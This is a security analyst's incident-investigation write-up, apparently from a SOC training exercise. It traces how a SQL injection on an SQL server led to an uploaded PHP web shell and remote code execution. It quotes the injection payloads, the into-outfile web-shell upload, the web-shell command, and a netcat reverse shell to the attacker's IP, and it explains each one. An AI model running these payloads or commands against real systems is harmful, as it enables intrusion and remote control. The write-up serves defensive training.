# Details
**EventID:** 89

**Event Time:** April 18, 2021, 1 p.m.

**Rule:** SOC142 - Multiple HTTP 500 Response

**Level:** Security Analyst

**Source Address** 101.32.223.119

**Source Hostname** 101.32.223.119

**Destination Address** 172.16.20.6

**Destination Hostname** SQLServer

**Username** www-data

**Request URL** https://172.16.20.6/userNumber=1 AND (SELECT * FROM Users) = 1

**User Agent** Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36

**Device Action** Allowed


# Analysis
- Source address is : 101.32.223.119
- Destination Address is : 172.16.20.6
- Looking at the destination address in Endpoint Management, the target was our SQL server.
- Let's see if the IP was flagged as malicious on VirusTotal.
- The IP was flagged as malicious by 5 vendors. So anything flagged as malicious by some security vendors, we should take some pre-caution with it.


## Logs
- We can search for the source address and the destination address in the Logs Management.
- We see a lot of entries and if we inspect one of them, it looks like they were trying for SQL injection at :
```sh
Request URL: https://172.16.20.6/userNumber=' OR '' = '
Response Code: 500
```
- At entry 392, it seems that they managed to upload a web shell.
```sh
Request URL: https://172.16.20.6/userNumber=' union select 1, '' into outfile '/var/www/html/cmd.php' #
Response Code: 200
```
- And for the last entry, it seems they have managed to achieve remote code execution.
```sh
Request URL: https://172.16.20.6/cmd.php?cmd=whoami
Response Code: 200
```

## Endpoint Management
- Let's search for the destination address.
- It is indeed our SQL server. Let's look at the command history.
```sh
2021-04-17 17:10: pwd
2021-04-17 17:12: ls

2021-04-17 18:12: mkdir tempDb

2021-04-17 18:54: cd tempDb

2021-04-17 18:55: git clone https://github.com/postgres/postgres

2021-04-18 09:12: apt-get update

2021-04-18 09:13: sudo apt-get install wget ca-certificates

2021-04-18 09:14: wget --quiet -O - https://www.postgresql.org/media/keys/ACCC4CF8.asc

2021-04-18 09:15: sudo apt-get install postgresql postgresql-contrib

2021-04-18 13:01: whoami

2021-04-18 13:02: id

2021-04-18 13:05: nc 101.32.223.119 1234 -e /bin/sh

2021-04-18 15:01: apt show postgresql

2021-04-18 15:02: sudo apt install postgresql postgresql-contrib
```
- If we look for the entries at time `13:01` until `13:05`, these looks fishy.
- If you don't know, `nc` is the command for netcat. Netcat is a networking utility to establish TCP or UDP connections.
```sh
nc 101.32.223.119 1234 -e /bin/sh
```
- So it's connecting to the source address on port 1234 and `-e` `/bin/sh ` where sh is a shell.
```sh
-e filename  specify filename to exec after connect (use with caution). 
```
- Now let's see if they were any network connections made to that IP.
```txt
2021-04-17 18:55: 140.82.121.3:
2021-04-18 18:56: 140.82.121.3:

2021-04-18 09:14: 217.196.149.50

2021-04-18 09:13: 217.196.149.50

2021-04-18 13:05: 101.32.223.119
```
- Looks like it indeed connected to the IP, so our SQL server was compromised.
- Let's look now at process to see if they started any weird process other than the netcat connection.
```sh
MD5:6008167a7b6ee9cc7e7d70351eca5d1c

Cmdline:rm -f /var/lib/clamav-unofficial-sigs/pid/clamav-unofficial-sigs.pid
```
- I'm not sure what its deleting, but I know for sure `clamav` is free and open source anti-virus program usually used in Linux. Deleting it is a bit suspicious.


# Final Verdict
- From all the evidence we see and collected, we can confirm that an attacker leveraged a SQL injection vulnerability on the SQL server to compromise the server. The threat actor managed to use the vulnerability to upload a web shell where the actor was able to perform remote code execution on the server. This leads to the compromise of the server. 

